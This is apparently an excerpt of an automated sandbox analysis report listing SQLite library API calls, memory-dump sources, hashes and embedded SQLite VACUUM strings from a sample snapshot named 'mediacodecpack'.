                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                        • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                          • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                         • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4082478743-0
                                                                                        • Opcode ID: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                                        • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                        • Opcode Fuzzy Hash: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                                        • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                          • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                          • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                          • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                        • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                         • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID: BINARY$INTEGER
                                                                                        • API String ID: 317512412-1676293250
                                                                                        • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                        • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                        • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                        • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B582
                                                                                        • sqlite3_step.SQLITE3 ref: 6094B590
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 6094B5AD
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094B5EE
                                                                                        • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                         • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 2802900177-0
                                                                                        • Opcode ID: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                        • Instruction ID: fa681a173a9aa7ad5377a8f3376375fc0286f70c891b696e42c92f52458a3a0e
                                                                                        • Opcode Fuzzy Hash: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                        • Instruction Fuzzy Hash: 0B517D75A082018FCB14CF69C48169EF7F7FBA8314F25C669D8499B318EA74EC81CB81
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                          • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                          • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                          • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                        • String ID:
                                                                                        • API String ID: 4038589952-0
                                                                                        • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                        • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                        • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                        • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                        APIs
                                                                                          • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                          • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                          • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                          • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094C719
                                                                                        • sqlite3_step.SQLITE3 ref: 6094C72A
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094C73B
                                                                                          • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                          • Part of subcall function 6094A9F5: sqlite3_free.SQLITE3(?,?,?,00000000,?,?,6094AC3F), ref: 6094AA7A
                                                                                        • sqlite3_free.SQLITE3 ref: 6094C881
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_freesqlite3_resetsqlite3_step$memmovesqlite3_column_int64
                                                                                        • String ID:
                                                                                        • API String ID: 3487101843-0
                                                                                        • Opcode ID: 010aee262a3d8dae5049234a4ef50880699508b325a3cdc2c8e6f431e5b9abd3
                                                                                        • Instruction ID: dadb85a3919e548a164012fc2e04d9b0ab11445217433cc10b515e99a95ed5c3
                                                                                        • Opcode Fuzzy Hash: 010aee262a3d8dae5049234a4ef50880699508b325a3cdc2c8e6f431e5b9abd3
                                                                                        • Instruction Fuzzy Hash: 3681FA74A046098FCB44DF99C480A9DF7F7AFA8354F258529E855AB314EB34EC46CF90
                                                                                        APIs
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                          • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                        • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                                        • sqlite3_step.SQLITE3 ref: 6096A435
                                                                                        • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 247099642-0
                                                                                        • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                        • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                                        • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                        • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                                        APIs
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                        • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                          • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                        • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                                        • String ID:
                                                                                        • API String ID: 326482775-0
                                                                                        • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                        • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                                        • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                        • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B71E
                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B73C
                                                                                        • sqlite3_step.SQLITE3 ref: 6094B74A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64$sqlite3_mutex_leavesqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 3305529457-0
                                                                                        • Opcode ID: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                                        • Instruction ID: cea3564161c85327b61b62d60446574847d05a2bcfebeda4641ea5396b37aa5a
                                                                                        • Opcode Fuzzy Hash: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                                        • Instruction Fuzzy Hash: D401A8B45047049FCB00DF19D9C968ABBE5FF98354F158869FC888B305D374E8548BA6
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1477753154-0
                                                                                        • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                        • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                                        • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                        • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                                        APIs
                                                                                          • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 609255B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1465156292-0
                                                                                        • Opcode ID: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                        • Instruction ID: 19c4c58ecb434a21204d9b38047e93a23a7f28015e8477a734fda6841bb58fe8
                                                                                        • Opcode Fuzzy Hash: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                        • Instruction Fuzzy Hash: 56317AB4A082188FCB04DF69D880A8EBBF6FF99314F008559FC5897348D734D940CBA5
                                                                                        APIs
                                                                                          • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1465156292-0
                                                                                        • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                        • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                                        • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                        • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                                        APIs
                                                                                          • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1465156292-0
                                                                                        APIs
                                                                                          • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 60925678
                                                                                        Similarity
                                                                                        • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1465156292-0
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 3064317574-0
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        APIs
                                                                                        • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                                          • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                        • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                                        • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                                        • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                                        • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                                        • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                                        • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                                        • API String ID: 1320758876-2501389569
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                                        • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                        • API String ID: 937752868-2111127023
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc$sqlite3_freesqlite3_vfs_find
                                                                                        • String ID: @$access$cache
                                                                                        • API String ID: 4158134138-1361544076
                                                                                        APIs
                                                                                        Strings
                                                                                        • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                                        • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                                        • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                                        • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                                        • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                                        • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                                        • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                                        • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                                        • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                                        • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                                        • BEGIN;, xrefs: 609485DB
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                                        • API String ID: 632333372-52344843
